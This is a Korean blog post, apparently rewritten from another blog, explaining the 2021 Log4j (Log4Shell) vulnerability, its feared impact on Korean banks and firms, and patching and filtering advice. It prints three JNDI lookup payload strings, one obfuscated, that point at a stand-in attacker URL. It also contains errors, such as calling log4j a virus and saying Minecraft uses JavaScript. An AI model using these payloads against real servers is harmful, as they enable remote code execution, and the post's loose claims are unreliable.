on
가장 치명적인 바이러스 log4j, 현황 분석 및 앞으로에 대한 전망...
가장 치명적인 바이러스 log4j, 현황 분석 및 앞으로에 대한 전망...
들어가기에 앞서, log4j? 대체 뭐야?
정부는 최근 보약 취약점이 발견된 '아파치 로그 4 제 이' 소프트웨어의 긴급 보안 업데이트를 기업들에 권고했다. 인터넷 서버를 이용하는 기업들이 해킹의 위협에 처하게 된 것이다.
log4j는 인터넷 서버 등의 유지와 관리를 위해 동작 상태를 기록하는 로깅 프로그램이다. 전 세계의 거의 모든 자바 기반 서버가 사용하는 오픈소스 로깅 라이브러리이다. 로깅 프로그램이니만큼 보안이 중요한데 여기에 그 보안과 관련된 취약점이 발견된 것이다.
국내에서 아직 피해가 보고된 사례는 없다. 국가정보원에 따르면 12월 11일 실태조사 및 보안패치 안내등을 하였으며 현재까지는 피해 사례가 없는 것으로 발표하였다.
log4j, 대체 왜 인류 역사상 가장 치명적인 컴퓨터 인터넷 바이러스로 불리는가?
무상 공개된 오픈 소스 서비스이기 때문에 애플 아마존 트위터 등을 비롯한 대부분의 IT회사들이 사용해왔으며 국내 대기업 말고도 인터넷 서버를 사용하는 다수의 회사들이 이 소프트웨어를 사용하 하기 때문에 피해 범위가 매우 광범위 해질 수 있다.
특히 많은 수의 우리나라 대기업의 업무용 웹사이트가 자바 1.8을 도입하지 않은 상황에서 보안 강화 패치는 자바 1.8을 사용해야 하기 때문에, 패치를 하려면 사이트를 자바 1.8에 맞추어 재구성해야 하기 때문에 며칠이 걸리지 모르는 게 더욱 문제라고 한다.
해커가 이 취약점을 사용하면 원격으로 서버에 접근하여 데이터를 맘대로 조작할 수 있으며 보안을 건너뛰고 서버의 모든 권한을 가질 수 있다.
아파치소프트웨어 재단은 로그4셸 취약점 보안 위협 수준을 1~10단계 중 10단계로 설정하였다.
단순 보안 취약점이 아니라 최고 등급이며, root 권한을 취득 가능한 해당 취약점으로 공격하면 대부분의 은행권 웹이 자바 기반인 우리나라의 경우 그 공격에서 버틸 수 없다는 게 문제이다.
인터넷 발전은 인터넷이 생긴 이후부터 지금까지 계속 되어왔으며, 때문에 현재의 인터넷 서버가 역사상 가장 큰 인터넷 서버라는 말이 된다(지금도 계속 갱신 중). 현대 산업과 기술은 인터넷과 초밀접한 관계에 있으며 서버를 통해 운영과 관리 등 모든 절차가 관련이 되는데 가장 큰 권한을 가진 라이브러리가 취약하다는 것은 현대 산업과 기술 또한 심각한 위험에 빠질 수 있다는 것을 말한다.
log4j, 발생 사례들은?
마인크래프트, 구글(google cloud), 아마존(Aws) 등의 서비스에 log4j를 사용하는 경우에는 취약점이 트리거가 되며,
공격자가 요청에
- ${jndi:rmi://공격자URL}
- ${jndi:ldap://공격자 URL}
- ${jndi:${lower:l}${lower:d} a${lower:p}://공격자 URL}
과 같이 요청 시 트리거 됩니다.
이렇게 매우 구체적으로 취약점에 대한 내용을 알 수 있다.
아직 한국에서는 피해사례가 보고되지 않았다. 하지만 사례가 없을 뿐 앞으로 관련 문제가 없을 거라는 보장은 없다. 실제로 한국의 여러 IT기업에서 서버를 담당하는 직원들은 문제가 제기된 날(12월 11일~12일쯤, 12월 12일은 공휴일임에도 불구하고) 급하게 회사에 출근했다고 한다. 해당 라이브러리를 다 삭제하고 보안패치 프로그램을 적용하는 등 예방에 전념을 다하는 모습이다.
현재 IT 관련 회사들은 반드시 12일까지 패치를 반드시 해야 한다는 방침을 가지고 있다.
하나의 라이브러리가 다른 여러 라이브러리를 공유하고 가져다 쓰기 때문에 log4j를 사용하면서도 인지하지 못할 가능성이 크다.
향후 log4j로 영향?
은행권, 금융권이 매우 긴장하고 대처할 가능성이 크다. 경제와 화폐와 관련해서 만약 취약점이 뚫리게 되면 대다수의 국가들의 경제 체계와 대부분의 개인의 삶까지 위험에 처해지게 될 것이다.
라이브러리 관련 서버 체인지 및 보안 강화 관련 기술의 연구와 보급이 가속화될 것이다.
이렇게 공공연하게 취약점이 알려진 만큼 해커들의 공격 가능성이 커질 것이다.
최초의 log4j 문제 발견, 마인크래프트, 어떻게 보면 다행이네!
마인 크래프는 마이크로소프트사의 대표적인 게임이다. 이 게임은 자바스크립트를 사용하는데 이 또한 log4j를 사용하기 때문에 보안 문제가 발견되었다. 사실 이 전에도 이 취약점에 대한 경고가 많았지만 마인크래프트의 보안 문제 발표를 통해 이슈가 되었다.
방지법 참고
과기부 보안 업데이트
과기부 보안 업데이트 권고
일단 과기부는 지난 11일 인터넷을 통해 보안 조처를 안내하였다. 아파치 재단이 6일 자사 누리집에 배포한 업데이트를 적요하면 취약점을 일단 해결할 수 있다고 한다.
보안 취약점 조치에 대한 자세한 사항은 보호나라 홈페이지 보안공지를 참고하고 국번 없이 118로 상담을 요청하면 가능하다.
log4j2.formatMsgNoLookups"를 "true"로 설정
log4j2.15.0(https://logging.apache.org/log4j/2.x/download.html) 업데이트
cloudflare 공지 참고, cloudflare WAF를 사용하는 사이트는 방화벽 차원에서 막을 수 있다고 한다.
request에서 jdni:ldap 등 이번에 문제 된 침입 경로 스트링 필터링해서 차단하시면 어느 정도 효과를 볼 수 있다고도 한다.
시놀로지는 해당 라이브러리를 쓰는 dsm, pkg가 없어 피해가 크지 않을 거라는 전망, 다만 서드파티 패키지나 VM, 도커 등은 직접 확인해보아야 할 필요가 있다고 한다.
포스팅을 마무리하며
현대사회는 유례없는 기술의 진보와 발전이 실현되고 있는 중이다. 모바일로 음식을 배달하고 위치를 확인할 수 있으며 거의 모든 돈은 개인과 회사, 금융권의 통신을 통해 순환된다. 스마트폰이 없으면 매장 출입도 불가능해졌다.
이러한 흐름 속에서 거의 모든 기업과 국가가 사용하는 라이브러리에 취약점이 발견된 것은 현대인의 삶을 직접적으로 위협하기도 하지만 이를 제외한 다른 현대 사회 기술 또한 위험에 처할 수도 있다는 보여준다. 편리함을 가져다준 현대 기술이 도리어 우리의 삶과 삶의 터전을 위협하지 않도록 이번 일을 반면교사 삼아 조심하고 예방해야 할 필요성이 있다.
from http://lookback.tistory.com/44 by ccl(A) rewrite - 2021-12-12 23:27:20